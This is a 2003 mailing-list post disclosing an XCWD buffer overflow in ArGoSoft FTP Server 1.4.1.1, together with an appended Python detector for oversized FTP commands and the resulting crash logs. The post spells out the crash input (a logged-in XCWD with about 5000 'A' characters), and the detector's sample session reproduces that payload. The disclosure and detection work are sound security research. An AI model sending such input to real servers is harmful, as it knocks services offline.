Vulnerability Development mailing list archives

argosoft ftp server buffer overflow.


From: "Moran Zavdi" <moran () moozatech com>
Date: Thu, 25 Sep 2003 08:59:03 -0700

Hi,

I've found that while using the command XCWD it is possible to overwrite the
server memory and crash it.
To overwrite the server's memory, an attacker has to do the following:
Verify the logging option is off (turned off by default).
Successfully log in to the FTP server.
At this point, if the attacker issues an XCWD command with an argument above
4096 chars, an overflow will occur.

I tested it on Windows 2000 and XP and they both crashed.

I used PuTTY to cause the overflow. :)
Here is what I did.

c:\> putty.exe localhost 21
220 ArGoSoft FTP Server for Windows NT/2000/XP, Version 1.4 (1.4.1.1)
user ftp
502 Unknown command
user ftp
331 User name OK, need password
pass ftp
230 User ftp logged in successfully **
XCWD AAAAAAA....(5000 times)
client closed connection.

The logs look like this:
9/22/2003 1:38:07 PM - FTP Server started. Listening on port 21
9/22/2003 1:38:34 PM - Requested FTP connection from 127.0.0.1 ID=1
9/22/2003 1:38:49 PM - (     1) 'Error: Access violation at address 00401F32
in module 'ftpsrvnt.exe'. Write of address 41414145

At this point the server will stop working and crash the program.

ArgoSoft has confirmed it's a bug while passing data using shared memory
that allows an attacker to bypass the internal
buffer overflow check of the program.
They released a new version to fix this issue, version 1.4.1.2.
It can be downloaded from:
http://www.argosoft.com/applications/ftpserver/download.asp


Regards,
Moran Zavdi
Moozatech IT Systems
http://www.moozatech.com
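
Added example, not part of the original post and not ArGoSoft's code: a defender-side check that flags FTP command lines whose argument exceeds the 4096-character threshold reported above, and parses the access-violation log entry to see whether the faulting address looks like client-supplied text. The function names and the SESSION sample are assumptions constructed for illustration; the log entry is the one quoted in the post.

```python
import re

MAX_ARG_LEN = 4096  # threshold reported in the post

# Constructed sample of client command lines, mirroring the session in the post.
SESSION = ["user ftp", "pass ftp", "XCWD " + "A" * 5000]

# Log entry copied from the post (its line wrap is preserved).
SERVER_LOG = """9/22/2003 1:38:34 PM - Requested FTP connection from 127.0.0.1 ID=1
9/22/2003 1:38:49 PM - (     1) 'Error: Access violation at address 00401F32
in module 'ftpsrvnt.exe'. Write of address 41414145
"""

CRASH_RE = re.compile(
    r"Access violation at address (?P<at>[0-9A-Fa-f]{8})\s+in module\s+"
    r"'(?P<module>[^']+)'\.\s+(?P<op>Read|Write) of address (?P<target>[0-9A-Fa-f]{8})"
)

def oversized_commands(lines, limit=MAX_ARG_LEN):
    """Return (verb, argument length) for command lines whose argument exceeds limit."""
    hits = []
    for raw in lines:
        verb, _, arg = raw.rstrip("\r\n").partition(" ")
        if len(arg) > limit:
            hits.append((verb.upper(), len(arg)))
    return hits

def crash_events(log_text):
    """Parse access-violation entries and flag fault addresses that look like input."""
    events = []
    for m in CRASH_RE.finditer(log_text):
        target = bytes.fromhex(m["target"])
        printable = all(0x20 <= b < 0x7F for b in target)
        # Three or more identical printable bytes (e.g. 41 41 41 ..) suggest
        # that filler text from the client ended up being used as a pointer.
        repeated = max(target.count(b) for b in set(target)) >= 3
        events.append({"module": m["module"], "op": m["op"],
                       "target": m["target"],
                       "input_derived": printable and repeated})
    return events

if __name__ == "__main__":
    print(oversized_commands(SESSION))
    print(crash_events(SERVER_LOG))
```
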

